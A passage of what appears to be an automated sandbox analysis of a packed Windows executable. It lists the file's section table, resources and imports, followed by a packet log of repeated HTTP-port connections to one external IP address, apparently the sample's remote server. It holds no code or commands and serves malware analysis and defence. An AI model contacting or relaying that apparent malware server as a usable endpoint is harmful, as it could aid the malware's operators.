                                          lerqcswm0x6ad0000x1a60000x1a5e0082525416338df0e1ab56f377e92208f8False0.9845434027777777data7.941431801128011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          gsvpblsk0x8530000x10000x4005549e3c01a5e2a3be1d1a9733f9ddabeFalse0.7890625data6.117290181640375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .taggant0x8540000x30000x2200f817d0c44529368b6e411a8447409ea2False0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_CURSOR0x40e7300x130data1.0361842105263157
                                          RT_CURSOR0x40e8600x25a8data1.0011410788381743
                                          RT_CURSOR0x410e080xea8data1.0029317697228144
                                          RT_ICON0x847eb80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SyriacSyriac0.3648720682302772
                                          RT_ICON0x848d600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SyriacSyriac0.5063176895306859
                                          RT_ICON0x8496080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SyriacSyriac0.5881336405529954
                                          RT_ICON0x849cd00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SyriacSyriac0.619942196531792
                                          RT_ICON0x84a2380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SyriacSyriac0.3574108818011257
                                          RT_ICON0x84b2e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SyriacSyriac0.3536885245901639
                                          RT_ICON0x84bc680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SyriacSyriac0.40425531914893614
                                          RT_ICON0x84c0d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSyriacSyriac0.7969083155650319
                                          RT_ICON0x84cf780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSyriacSyriac0.8032490974729242
                                          RT_ICON0x84d8200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSyriacSyriac0.7350230414746544
                                          RT_ICON0x84dee80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSyriacSyriac0.7774566473988439
                                          RT_ICON0x84e4500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SyriacSyriac0.6827800829875519
                                          RT_ICON0x8509f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SyriacSyriac0.7293621013133208
                                          RT_ICON0x851aa00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SyriacSyriac0.7594262295081967
                                          RT_ICON0x8524280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SyriacSyriac0.8111702127659575
                                          RT_DIALOG0x41c6880x84empty0
                                          RT_STRING0x41c70c0x4beempty0
                                          RT_STRING0x41cbcc0xc4empty0
                                          RT_STRING0x41cc900x732empty0
                                          RT_STRING0x41d3c40x7bcempty0
                                          RT_STRING0x41db800x5f0empty0
                                          RT_STRING0x41e1700x696empty0
                                          RT_STRING0x41e8080x7c0empty0
                                          RT_STRING0x41efc80x76aempty0
                                          RT_STRING0x41f7340x610empty0
                                          RT_GROUP_CURSOR0x41fd440x22empty0
                                          RT_GROUP_CURSOR0x41fd680x14empty0
                                          RT_GROUP_ICON0x8528900x76dataSyriacSyriac0.6779661016949152
                                          RT_GROUP_ICON0x8529060x68dataSyriacSyriac0.7115384615384616
                                          RT_VERSION0x85296e0x1b8COM executable for DOS0.5704545454545454
                                          RT_MANIFEST0x852b260x152ASCII text, with CRLF line terminators0.6479289940828402

                                          Imports

                                          DLLImport
                                          kernel32.dlllstrcpy

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          SyriacSyriac

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 13, 2024 06:12:22.488192081 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:22.607892990 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:22.608022928 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:22.608180046 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:22.727869034 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:23.975517035 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:23.977713108 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:24.157538891 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:24.277384043 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:24.634342909 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:24.634682894 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:24.645905972 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:24.766088009 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.202938080 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.203006983 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.203043938 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.203078032 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.203084946 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.203114986 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.203140020 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.203151941 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.203188896 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.203202009 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.203228951 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.203236103 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.203267097 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.203320026 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.211251974 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.211334944 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.211422920 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.211529970 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.219698906 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.219758987 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.323237896 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.323307037 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.394932985 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.395124912 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.395128965 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.395186901 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.398823023 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.398885965 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.399046898 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.399337053 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.406960964 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.407047987 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.407083035 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.407095909 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.414835930 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.414910078 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.414984941 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.415047884 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.422791004 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.422858000 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.422910929 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.423017025 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.430772066 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.430831909 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.430891991 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.430953026 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.438818932 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.438879013 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.438882113 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.439193010 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.446697950 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.446804047 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.446887970 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.454792976 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.454852104 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.454863071 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.455004930 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.462686062 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.462750912 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.462799072 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.462843895 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.470410109 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.470473051 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.470494986 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.470588923 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.477991104 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.478075981 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.478135109 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.587047100 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.587145090 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.587201118 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.589454889 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.589579105 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.589637995 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.594362020 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.594513893 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.594566107 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.599280119 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.599334955 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.599464893 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.599528074 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.604177952 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.604238987 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.604279041 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.604331970 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.608798981 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.608855963 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.608949900 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.609004021 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.613336086 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.613442898 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.613478899 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.613478899 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.617882013 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.617935896 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.617995977 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.618041992 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.622411966 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.622478962 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.622512102 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.622551918 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.626924992 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.626983881 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.627010107 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.627264023 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.631458044 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.631520033 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.631603956 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.631669044 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.635987997 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.636043072 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.636085033 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.636181116 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.640480042 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.640533924 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.640548944 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.640590906 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.644994020 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.645045042 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.645124912 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.645272017 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.649486065 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.649543047 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.649574041 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.649615049 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.653987885 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.654047012 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.654107094 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.654151917 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.658505917 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.658560991 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.658607960 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.658690929 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.663063049 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.663125038 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.663146019 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.663217068 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.667546988 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.667610884 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.667649031 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.667695999 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.672063112 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.672135115 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.672151089 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.672209978 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.676565886 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.676625013 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.676736116 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.676784992 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.681097031 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.681142092 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:25.681152105 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.681184053 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.705229998 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:25.824914932 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:26.190165043 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:26.190325975 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:28.213033915 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:28.332906961 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:28.700536013 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:28.700666904 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:30.744301081 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:30.864061117 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:31.235162973 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:31.235280991 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:33.259049892 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:33.378937006 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:33.747785091 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:33.747863054 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:35.774940014 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:35.894839048 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:36.258832932 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:36.258900881 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:38.290361881 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:38.410161972 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:38.786434889 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:38.786678076 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:40.821625948 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:40.941370010 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:41.311126947 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:41.311216116 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:43.339262009 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:43.459006071 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:43.836774111 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:43.836864948 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:45.869149923 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:45.989027977 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:46.354108095 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:46.354175091 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:48.384077072 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:48.503850937 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:48.892077923 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:48.893109083 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:50.930975914 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:51.050712109 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:51.413856983 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:51.413978100 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:54.493275881 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:54.493673086 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:54.613579035 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:54.613681078 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:54.613821983 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:54.613847971 CET804971680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:54.614037991 CET4971680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:54.733948946 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.108979940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.109026909 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.109062910 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.109147072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.109189987 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.109215975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.109249115 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.109283924 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.109301090 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.109334946 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.109369993 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.109380960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.109402895 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.109414101 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.109437943 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.109483957 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.229480982 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.229535103 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.229604959 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.229635954 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.300932884 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.301060915 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.301166058 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.301166058 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.305003881 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.305109024 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.305126905 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.305217028 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.313396931 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.313476086 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.316473961 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.316546917 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.316589117 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.316649914 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.324886084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.324954987 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.325037956 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.325104952 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.333278894 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.333354950 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.333374977 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.333436966 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.341717958 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.341850042 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.341854095 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.342010975 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.350104094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.350220919 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.350225925 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.350286961 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.358566046 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.358624935 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.358647108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.358680010 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.366936922 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.367048979 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.367115974 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.367170095 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.375355959 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.375478029 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.375565052 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.383774996 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.383971930 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.492959976 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.493074894 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.493141890 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.493303061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.495495081 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.495598078 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.495654106 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.495693922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.500557899 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.500638008 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.500691891 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.500756025 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.505618095 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.505685091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.505757093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.505817890 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.510490894 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.510593891 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.510610104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.511181116 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.515361071 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.515425920 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.515465021 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.515530109 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.520235062 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.520308971 CET4978680192.168.2.580.82.65.70
